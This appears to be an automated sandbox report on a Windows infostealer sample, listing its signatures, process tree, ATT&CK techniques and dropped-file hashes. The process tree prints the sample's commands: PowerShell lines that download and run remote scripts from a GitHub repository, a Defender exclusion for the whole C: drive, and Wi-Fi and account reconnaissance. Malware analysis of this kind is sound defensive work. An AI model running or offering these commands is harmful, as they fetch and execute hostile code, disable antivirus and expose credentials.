Overview

overview

10

Static

static

10

2024-10-14...ch.exe

windows7-x64

1

2024-10-14...ch.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    146s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/10/2024, 16:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-10-14_5caf8a4e165d0ede23ca16c1954e6e4e_poet-rat_snatch.exe

  • Size

    9.8MB

  • MD5

    5caf8a4e165d0ede23ca16c1954e6e4e

  • SHA1

    298f055ae4c3fee613b994c2450454b4ca311abe

  • SHA256

    889fcffb92c1e52ec1ed263476298bf0dee82c5dddbcf0e5e0c9e6c42cfd55b0

  • SHA512

    74e5950bd46e169ad3583f2155b2ef414e6f862fd26bbf1f32bc3b91a0ef03e15b76967d58661b3a1d273303f12103d650b659ddc6684be5de0e58746dc52c97

  • SSDEEP

    98304:C3BUxzQ38BsPGlgw97DB7prt8EREv/lLl8EnGpaeiWZ:C3138Bdxiv/lLl8PZ

Score
9/10
discoveryevasionexecutionpersistenceprivilege_escalationspywarestealer

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

    discovery
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

    discovery
  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-14_5caf8a4e165d0ede23ca16c1954e6e4e_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-14_5caf8a4e165d0ede23ca16c1954e6e4e_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:512
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jgjncxzu\jgjncxzu.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA018.tmp" "c:\Users\Admin\AppData\Local\Temp\jgjncxzu\CSC5F8FF8BDA1D5430283B89463EDD5E7FE.TMP"
          4⤵
            PID:2440
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          3⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:4448
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" localgroup administrators
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4088
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            4⤵
              PID:896
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            3⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1000
          • C:\Windows\system32\whoami.exe
            "C:\Windows\system32\whoami.exe" /all
            3⤵
              PID:3980
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" user
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4552
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user
                4⤵
                  PID:5064
              • C:\Windows\system32\ipconfig.exe
                "C:\Windows\system32\ipconfig.exe" /displaydns
                3⤵
                • Gathers network information
                PID:4384
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1428
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup
                  4⤵
                    PID:2076
                • C:\Windows\System32\Wbem\WMIC.exe
                  "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
                  3⤵
                    PID:3468
                  • C:\Windows\system32\NETSTAT.EXE
                    "C:\Windows\system32\NETSTAT.EXE" -ano
                    3⤵
                    • System Network Connections Discovery
                    • Gathers network information
                    PID:840
                  • C:\Windows\System32\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
                    3⤵
                      PID:3300
                    • C:\Windows\system32\ipconfig.exe
                      "C:\Windows\system32\ipconfig.exe" /all
                      3⤵
                      • Gathers network information
                      PID:3844
                    • C:\Windows\system32\ROUTE.EXE
                      "C:\Windows\system32\ROUTE.EXE" print
                      3⤵
                        PID:1952
                      • C:\Windows\system32\ARP.EXE
                        "C:\Windows\system32\ARP.EXE" -a
                        3⤵
                        • Network Service Discovery
                        PID:4908
                      • C:\Windows\system32\netsh.exe
                        "C:\Windows\system32\netsh.exe" wlan show profile
                        3⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2720
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3580
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5024

                  Network

                  MITRE ATT&CK Enterprise v15

                  Reconnaissance

                  Resource Development

                  Initial Access

                  Execution

                  Command and Scripting Interpreter

                  2
                  T1059

                  PowerShell

                  1
                  T1059.001

                  Persistence

                  Account Manipulation

                  1
                  T1098

                  Create or Modify System Process

                  1
                  T1543

                  Windows Service

                  1
                  T1543.003

                  Event Triggered Execution

                  1
                  T1546

                  Netsh Helper DLL

                  1
                  T1546.007

                  Privilege Escalation

                  Account Manipulation

                  1
                  T1098

                  Create or Modify System Process

                  1
                  T1543

                  Windows Service

                  1
                  T1543.003

                  Event Triggered Execution

                  1
                  T1546

                  Netsh Helper DLL

                  1
                  T1546.007

                  Defense Evasion

                  Impair Defenses

                  1
                  T1562

                  Disable or Modify System Firewall

                  1
                  T1562.004

                  Credential Access

                  Credentials from Password Stores

                  1
                  T1555

                  Credentials from Web Browsers

                  1
                  T1555.003

                  Unsecured Credentials

                  2
                  T1552

                  Credentials In Files

                  2
                  T1552.001

                  Discovery

                  Browser Information Discovery

                  1
                  T1217

                  Network Service Discovery

                  1
                  T1046

                  Permission Groups Discovery

                  1
                  T1069

                  Local Groups

                  1
                  T1069.001

                  System Information Discovery

                  1
                  T1082

                  System Network Configuration Discovery

                  1
                  T1016

                  Wi-Fi Discovery

                  1
                  T1016.002

                  System Network Connections Discovery

                  1
                  T1049

                  Lateral Movement

                  Collection

                  Data from Local System

                  2
                  T1005

                  Command and Control

                  Web Service

                  1
                  T1102

                  Exfiltration

                  Impact

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Filesize

                    328B

                    MD5

                    f65c679f69eed27a0a342551e742550b

                    SHA1

                    21e7b7922cdc85ada08633a7b15ddfc6f5595826

                    SHA256

                    1d4504f378fd97b7d724ebb9180b7aa65ae154169e3f34305482682e61389a09

                    SHA512

                    1e19e4ff846d087270f0cf4612bacb87243844e6d2ecd99eb962b154f0abc95f029745625999312ae29f18168d8e94ad203aec3937f0c406d0821f7343e80e57

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    496B

                    MD5

                    4909c22f87c7600c70c045ef8a0cf3ba

                    SHA1

                    8721958231e68babe6ad8fe4e16e9b443b5258e0

                    SHA256

                    c7f32431b109e2bc9bebeaacb7de276e3dd3b29bda7fbe231c99f8ade8f3df5c

                    SHA512

                    ad5a4b1e7cb796c870aa7eea6c1f0fb0e0c3ffb958333d7cd97cb6be771b5167ecce0ee267e27b64bc1c35d4322bf07925ebaf65dd2a84f4b1ca9fbf79e06751

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    1KB

                    MD5

                    1867ca0f3ba7d8b0ab3169eb1b17b2e8

                    SHA1

                    40c51c3b00d3d229c2a56011b4a02fdcbd026187

                    SHA256

                    ab51c217e9153dbcdf109ea319478d39cfbb825de7d60e565118d6168212baa8

                    SHA512

                    aba4abcb7a88b43b1921c2fe58d3c1e2125c411d54f845b22b9db026fd32784d2e67d08bb7fe52782d6cf803a22721a7b4ec0be0adc8317a9c1db11d40659b71

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\RESA018.tmp
                    Filesize

                    1KB

                    MD5

                    f8dba2db4979074d980c9d1fadc0db34

                    SHA1

                    9f48b091fca3c94db160bca8d6e8bc7113f762db

                    SHA256

                    f824ce7f60dc61c4411bab9daa21a2d4742b358306fc14b4da53848405a6782c

                    SHA512

                    9b19e17de7006af0700c10ebe725773cf780fb0db7361d27f67c4ced4c717a3d3b0908b895255a76dced2abdccaa152a3bc46fd1cc805af5f48a80efeba3ebf0

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip
                    Filesize

                    1.0MB

                    MD5

                    d8bc7d5d1ec8aca8c0fec0d60d46c965

                    SHA1

                    244022556151ac0d90b58c9483989a813671df42

                    SHA256

                    f49197794f11d9a8a397cd1562b607d09a45f0f6f63d3a8b25cbdad57060ffa7

                    SHA512

                    9b78297f133189f81bdf600b83fb88b93c7cf8dbab8c2188640fd8aacd2e1ba1b120e127e1b931e9119d0653256960137c9de9c60facb9ecc8d43ebcc84b5e77

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SensitiveFiles\UnprotectPublish.txt
                    Filesize

                    666KB

                    MD5

                    17daa6b39df8f4199d739c098d6f31aa

                    SHA1

                    bb7e431f1232a4a7a46d3f1c4812531fd1d7cc68

                    SHA256

                    3aa567d6da5b7d9034b30d0751f89ee65cec66c4afe819d716201af70018776f

                    SHA512

                    d779ffc56117be709ceeac1f2b1ff165c897d2e92ac4bd0eb1a105f16816477c00d2165c25d176cefb3b6125f9ae1cf60f54bc7ad5548d0deb5d977bd5065090

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt
                    Filesize

                    22KB

                    MD5

                    da8ded933860d1f8b88594d59b44c3e7

                    SHA1

                    8949db7310591328f3aefb76c89f8a763f0a189b

                    SHA256

                    3187b377e9e31d85343cc9898f481e393002dd2049b9b8dcfbf10443b87cc84b

                    SHA512

                    a670098dda93157826efdd6623155cb9b47166e2fae956c1019ce208fea4f93ee2b7fdd43480d3550c850cdd80d5e3e9b921f4a243519f5cd59fb5d65c21af95

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_003t2c3l.sss.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\jgjncxzu\jgjncxzu.dll
                    Filesize

                    4KB

                    MD5

                    8ed0f9659615917cc07f0919d4ce202c

                    SHA1

                    9fb7cdb1566c333a4f00a85a3e9d7f689d31e1df

                    SHA256

                    cf65ac5e9f2d90573065e02d1b9d7279c4912dd9fadc80652a3f2d3963d7e70d

                    SHA512

                    0ebff734fa6d777dc7182530ddaae1ca89b569a4ba218d1174f6571849adccfb25ad9e3c9a260cef4b5d4087d60335d5c620e35ced715c126ef143b0ffdd0d6e

                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\jgjncxzu\CSC5F8FF8BDA1D5430283B89463EDD5E7FE.TMP
                    Filesize

                    652B

                    MD5

                    f7fad21305eb4ce7dab549e078ed215a

                    SHA1

                    d3638db1e77fb8ecd807f995f5a3709c5532572d

                    SHA256

                    ec8dcb4e7bb95d61fa918ed88e9fae9251c3829b269720f6bfda98f16ba85cef

                    SHA512

                    c732e40e142f7cef37009a78a6ead5f087abacb04ddaa08384163a9e7284d9be96bdfa4a5cdc8f98b5d18b99b71e5c33eada9a3e4cb3b01dd8bd7980eeaf79da

                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\jgjncxzu\jgjncxzu.0.cs
                    Filesize

                    1KB

                    MD5

                    8a1e7edb2117ec5dde9a07016905923b

                    SHA1

                    0155dbeeb16333e2eaa767b0209750efee56f47f

                    SHA256

                    c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

                    SHA512

                    4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

                    Download Submit

                  • \??\c:\Users\Admin\AppData\Local\Temp\jgjncxzu\jgjncxzu.cmdline
                    Filesize

                    369B

                    MD5

                    b7a609bb77d5aa0e2b12fed151cba77e

                    SHA1

                    7aa945fa51c5dffbbeacbd59a66cd79ac52c973d

                    SHA256

                    83238b9fe446c0e5052ccdfca31525be8c1686d777ded65c2054c1285449da62

                    SHA512

                    328d7ac390b4406dd7dd664023cd67b83cffbdfc2cea73726d8ed7d595c4e4cc1554ac2f026d1f8d89f73fe92f01d663a5830374ce35f41cf14f0516ed2b50d1

                    Download Submit

                  • memory/512-4-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/512-111-0x0000023073990000-0x000002307399A000-memory.dmp

                    Filesize

                    40KB

                    Download

                  • memory/512-110-0x00000230739A0000-0x00000230739B2000-memory.dmp

                    Filesize

                    72KB

                    Download

                  • memory/512-0-0x00007FF858793000-0x00007FF858795000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/512-121-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/512-73-0x0000023070FB0000-0x0000023070FB8000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/512-77-0x0000023073990000-0x00000230739BA000-memory.dmp

                    Filesize

                    168KB

                    Download

                  • memory/512-78-0x0000023073990000-0x00000230739B4000-memory.dmp

                    Filesize

                    144KB

                    Download

                  • memory/512-16-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3580-26-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3580-49-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3580-56-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3580-36-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/3580-14-0x0000019AF47C0000-0x0000019AF47E2000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/5024-38-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5024-60-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5024-51-0x000002055E980000-0x000002055F126000-memory.dmp

                    Filesize

                    7.6MB

                    Download

                  • memory/5024-50-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/5024-37-0x00007FF858790000-0x00007FF859251000-memory.dmp

                    Filesize

                    10.8MB

                    Download